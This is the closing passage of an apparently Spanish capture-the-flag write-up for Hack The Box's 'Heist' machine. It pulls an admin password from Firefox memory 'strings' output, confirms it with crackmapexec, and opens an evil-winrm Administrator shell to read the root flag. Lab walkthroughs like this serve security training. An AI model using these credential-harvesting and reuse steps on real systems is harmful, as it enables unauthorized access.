pref("signon.recipes.path",                 "chrome://passwordmgr/content/recipes.json");
// This temporarily prevents the master password to reprompt for autocomplete.
pref("urlclassifier.passwordAllowTable", "goog-passwordwhite-proto");
pref("urlclassifier.disallow_completions", "goog-downloadwhite-digest256,base-track-digest256,mozstd-trackwhite-digest256,content-track-digest256,mozplugin-block-digest256,mozplugin2-block-digest256,block-flash-digest256,except-flash-digest256,allow-flashallow-digest256,except-flashallow-digest256,block-flashsubdoc-digest256,except-flashsubdoc-digest256,goog-passwordwhite-proto,ads-track-digest256,social-track-digest256,analytics-track-digest256,base-fingerprinting-track-digest256,content-fingerprinting-track-digest256,base-cryptomining-track-digest256,content-cryptomining-track-digest256,fanboyannoyance-ads-digest256,fanboysocial-ads-digest256,easylist-ads-digest256,easyprivacy-ads-digest256,adguard-ads-digest256,social-tracking-protection-digest256,social-tracking-protection-facebook-digest256,social-tracking-protection-linkedin-digest256,social-tracking-protection-twitter-digest256");
pref("browser.safebrowsing.provider.google4.lists", "goog-badbinurl-proto,goog-downloadwhite-proto,goog-phish-proto,googpub-phish-proto,goog-malware-proto,goog-unwanted-proto,goog-harmful-proto,goog-passwordwhite-proto");
  pref("services.sync.engine.passwords", true);
  pref("services.sync.engine.passwords.validation.interval", 86400); // 24 hours in seconds
  pref("services.sync.engine.passwords.validation.percentageChance", 10);
  pref("services.sync.engine.passwords.validation.maxRecords", 1000);
content passwordmgr toolkit/content/passwordmgr/
locale passwordmgr en-US en-US/locale/en-US/passwordmgr/
EnterLoginForRealm3=%2$S is requesting your username and password. The site says: 
EnterLoginForProxy3=The proxy %2$S is requesting a username and password. The site says: 
EnterUserPasswordFor2=%1$S is requesting your username and password.
EnterUserPasswordForCrossOrigin2=%1$S is requesting your username and password. WARNING: Your password will not be sent to the website you are currently visiting!
EnterPasswordFor=Enter password for %1$S on %2$S
input[type=password] > .anonymous-div,
input[type=password] > .preview-div {
   * In password fields, any character should be put same direction.  Otherwise,

Si analizamos detalladamente el resultado de este filtrado para la salida del comando "strings", podremos ver que hay unas credenciales:

MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=

Las siguiente credenciales:

Usuario: admin@support.htb
Password: 4dD!5}x/re8]FBuZ

Estos datos, vienen de solicitudes que ha realizado el usuario que tenia abierto el Firefox

`3.2 Reutilización de credenciales`

Vamos a intentar logearnos con "evil-winrm" con la contraseña obtenida "4dD!5}x/re8]FBuZ" al usuario "Administrator" para probar si estamos ante un caso de reutilización de credenciales, pero antes vamos a verificar las credenciales con crackmapexec

crackmapexec winrm 10.10.10.149 -u 'Administrator' -p '4dD!5}x/re8]FBuZ'

❯ crackmapexec winrm 10.10.10.149 -u 'Administrator' -p '4dD!5}x/re8]FBuZ'
SMB         10.10.10.149    5985   SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 (name:SUPPORTDESK) (domain:SupportDesk)
HTTP        10.10.10.149    5985   SUPPORTDESK      [*] http://10.10.10.149:5985/wsman
WINRM       10.10.10.149    5985   SUPPORTDESK      [+] SupportDesk\Administrator:4dD!5}x/re8]FBuZ (Pwn3d!)

Usuario: Administrator
Contraseña: 4dD!5}x/re8]FBuZ

Podemos ver que las credenciales son correctas, ahora vamos a logearnos con evil-winrm

❯ evil-winrm -i 10.10.10.149 -u 'Administrator' -p '4dD!5}x/re8]FBuZ'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

`3.3 Obtención de la flag root`

La flag de root, se encuentra dentro del directorio "C:\Users\Administrator\Desktop\root.txt":

*Evil-WinRM* PS C:\Users\Administrator\Documents> type "C:\Users\Administrator\Desktop\root.txt"
316b1b88ab7b95b633b1e35a0115c88d
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Con esto, concluimos la maquina "Heist" de Hack The Box

Espero te haya sido de ayuda este Write Up :)

Si tuviste alguna dificultad a la hora de resolverlo, no olvides contactarme en mis redes sociales

Owned Heist from Hack The Box!

AnteriorBastion [EASY🟢]SiguienteShocker [EASY🟢]

Última actualización hace 3 meses